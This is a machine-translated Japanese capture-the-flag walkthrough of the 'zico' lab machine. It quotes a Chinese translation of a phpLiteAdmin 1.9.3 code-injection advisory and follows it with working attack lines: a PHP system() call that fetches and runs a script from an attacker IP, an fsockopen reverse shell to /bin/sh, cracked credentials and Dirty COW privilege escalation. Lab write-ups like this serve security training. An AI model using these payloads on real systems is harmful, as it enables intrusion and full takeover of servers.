ターゲットマシンのテスト-zico

メッセージを収集する

ホストの発見

nmap -sV

宛先IPアドレスは192.168.133.134です。

ポートスキャン

マスカンを使用する：

masscan --rate = 10000 --port 0-65535 192.168.133.134

nmapを使用して、バージョンなどの情報を検出します。

プローブCMS

whatwebを使用します。

ディレクトリスキャン

脆弱性の発見

このページのURLのページ変数の値がhtmlファイルである

ことがわかりました。tools.htmlに直接アクセスできます。直接アクセスできます。ファイルインクルードが使用されていると推測され、ファイルが存在する可能性があります。インクルードの脆弱性。

手動で試してください

。ファイルインクルードの脆弱性があります。

エクスプロイト

ディレクトリスキャンで、dbadmin（db-database？admin-familiar admin）があることがわかりました。次のサイトに
アクセスしてください。

phpファイル：

データベースのログインページを開き、バージョン情報を入力します。

弱いパスワードでログインしてみてください：

管理者によるログインの成功：

2人のユーザーに関する情報を取得しました。

復号化、最終的な対応は次のとおりです。

root–34kroot34 zico
–zico2215 @

sshリモートログインを試してください：

失敗。

searchsploitを使用する：

txtコンテンツを表示する（直接翻訳）：

#漏洞标题：phpliteadmin<=1.9.3远程PHP代码注入漏洞

#谷歌怪人：inurl:phpliteadmin.php文件（默认密码：admin）

#日期：2013年10月1日

#利用作者：L@usch公司- http://la.usch.io-http://la.usch.io/files/exploits/phpliteadmin-1.9.3.txt

#供应商主页：http://code.google.com/p/phpliteadmin/

#供应商状态：通知

#软件链接：http://phpliteadmin.googlecode.com/files/phpliteadmin\u v1-9-3.zip

#版本：1.9.3

#测试环境：Windows和Linux



说明：



phpliteadmin.php#1784：'创建新数据库'=>

phpliteadmin.php#1785：'创建新数据库时，如果您自己不包括该数据库，则输入的名称将附加相应的文件扩展名（.db、.db3、.sqlite等）。数据库将在指定为$directory变量的目录中创建。“，



攻击者可以使用php扩展创建sqlite数据库，并将php代码作为文本字段插入。完成后，攻击者只需使用Webbrowser访问数据库文件即可执行该操作。



概念证明：



1我们创建了一个名为“黑客.php".

（取决于服务器配置，有时它将不起作用，数据库的名称将为“黑客.sqlite". 然后尝试将数据库/现有数据库重命名为“黑客.php".)

脚本将sqlite数据库存储在phpliteadmin.php文件.

预览：http://goo.gl/B5n9O

十六进制预览：http://goo.gl/lJ5iQ



2现在在此数据库中创建一个新表，并插入一个具有默认值的文本字段：

<?php phpinfo（）？>

十六进制预览：http://goo.gl/v7USQ



三。现在我们跑黑客.php



多恩

内容によると、テスト：
phpinfoの挿入：

ファイルインクルードの脆弱性によるローカルインクルード：

phpinfo情報を返し、構成を確認すると、リモートインクルードがオンになりません。

リモートダウンロードコマンドを記述し、シェルスクリプトをダウンロードします。

<?php system("wget IP地址/shell.txt -O /tmp/shell.php; php /tmp/shell.php");?>

-Oは指定されたディレクトリに出力します。

/ tmpディレクトリに必要な権限が低いため、このディレクトリに出力します。

shell.txtの内容は次のとおりです。

<?php $sock=fsockopen("IP地址",监听端口);exec("/bin/sh -i <&3 >&3 2>&3")?>

このステートメントをリバースシェルのデータベースに直接挿入すると、接続は失敗します。

したがって、リモートダウンロードを介して。

まず、shell.txtファイルを作成します。

httpサービスをオンにします。

インサート：

<？phpsystem（ "wgetIPアドレス/shell.txt-O/tmp/shell.php; php /tmp/shell.php"）;？>

ローカルインクルードを実行して監視

します。シェルに正常に戻ります。

右エスカレーション

rootユーザーのパスワードは以前にデータベースから取得されており、特権をエスカレートしようとしました。

ここでターミナルを開く必要があります。

Pythonを使用して、ターミナルを開きます。

 python -c 'import pty; pty.spawn("/bin/bash")';

権利のエスカレーションに失敗しました：

汚れた牛を使用して権利をエスカレーションします。

1.ダーティカウスクリプトファイルをリモートでダウンロードします。

ダウンロードが失敗したことがわかりました。

権限の表示：

権限の付与：

tmpディレクトリへの入力：

正常なダウンロード：

コンパイルして実行します。

gcc -pthread dirty.c -o exp -lcrypt // expは出力ファイル名です（固定形式）

パスワードを123（オプション）に設定します。

権利の拡大は成功しました。

総括する

脆弱性を含むファイルが発見された場合は、脆弱性の検証を強化する必要があります。

searchsploitを使用して脆弱性を悪用する方法を学びました。

権限をエスカレートするときは、/ tmpディレクトリの使用を強化する必要があります。

汚れた牛がエスカレーションに成功した後、元の/ etc / passwdを復元する必要があります。